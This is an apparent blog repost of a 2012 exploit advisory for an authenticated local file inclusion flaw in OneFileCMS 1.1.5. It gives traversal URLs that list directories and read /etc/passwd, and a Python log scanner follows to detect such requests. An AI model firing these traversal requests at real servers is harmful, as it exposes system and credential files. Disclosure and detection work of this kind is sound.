
OneFileCMS v.1.1.5 Local File Inclusion Vulnerability

16 Mar


# Exploit Title: OneFileCMS v.1.1.5 Local File Inclusion Vulnerability
# Google Dork: –
# Date: 16/03/2012
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/
# Software Link: https://github.com/rocktronica/OneFileCMS
# Version: OneFileCMS v.1.1.5
# Tested on: Linux Fedora 14

===============
Description
===============
OneFileCMS is just that. It’s a flat, light, one file CMS (Content Management System) entirely contained in an easy-to-implement, highly customizable, database-less PHP script. Coupling a utilitarian code editor with all the basic necessities of an FTP application, OneFileCMS can maintain a whole website completely in-browser without any external programs.

=======================================================
[!] All vulnerabilities require authentication. [!]
=======================================================

Directory Listing, using the “i” parameter:
http://TARGET/onefilecms/onefilecms.php?i=../../../../

Read local files, using the “f” parameter:
http://TARGET/onefilecms/onefilecms.php?f=../../../../etc/passwd
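
A defender-side check for the two requests above, added here as an example (it is not part of the original advisory or of OneFileCMS): it scans web-server access logs for "i" or "f" values sent to onefilecms.php that normalise to a path above the starting directory. The combined log format, the sample lines and the function names are assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [16/Mar/2012:10:00:01 +0000] "GET /onefilecms/onefilecms.php?i=images/ HTTP/1.1" 200 2310
192.0.2.44 - - [16/Mar/2012:10:02:17 +0000] "GET /onefilecms/onefilecms.php?f=../../../../etc/passwd HTTP/1.1" 200 1822
192.0.2.44 - - [16/Mar/2012:10:02:30 +0000] "GET /onefilecms/onefilecms.php?i=%2e%2e%2f%2e%2e%2f HTTP/1.1" 200 4096
192.0.2.10 - - [16/Mar/2012:10:05:00 +0000] "GET /onefilecms/onefilecms.php?f=css/../index.html HTTP/1.1" 200 900
192.0.2.77 - - [16/Mar/2012:10:06:00 +0000] "GET /blog/index.php?f=../x HTTP/1.1" 404 120
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
WATCHED_PARAMS = ("i", "f")  # the two parameters named in the advisory


def escapes_root(value):
    """True if a relative path value climbs above the directory it starts in."""
    for _ in range(3):  # peel extra layers of percent-encoding (%252e -> %2e -> .)
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    norm = posixpath.normpath(value.replace("\\", "/"))
    return norm == ".." or norm.startswith("../")


def find_traversal(log_text):
    """Return (client_ip, parameter, decoded_value) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/onefilecms.php"):
            continue
        query = parse_qs(url.query, keep_blank_values=True)  # decodes one layer
        for param in WATCHED_PARAMS:
            for value in query.get(param, []):
                if escapes_root(value):
                    hits.append((ip, param, value))
    return hits


if __name__ == "__main__":
    for hit in find_traversal(SAMPLE_LOG):
        print(hit)
```

Normalising before matching keeps legitimate values such as css/../index.html from being flagged while still catching percent-encoded "../" sequences.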

 

Posted by on March 16, 2012 in Exploits

 
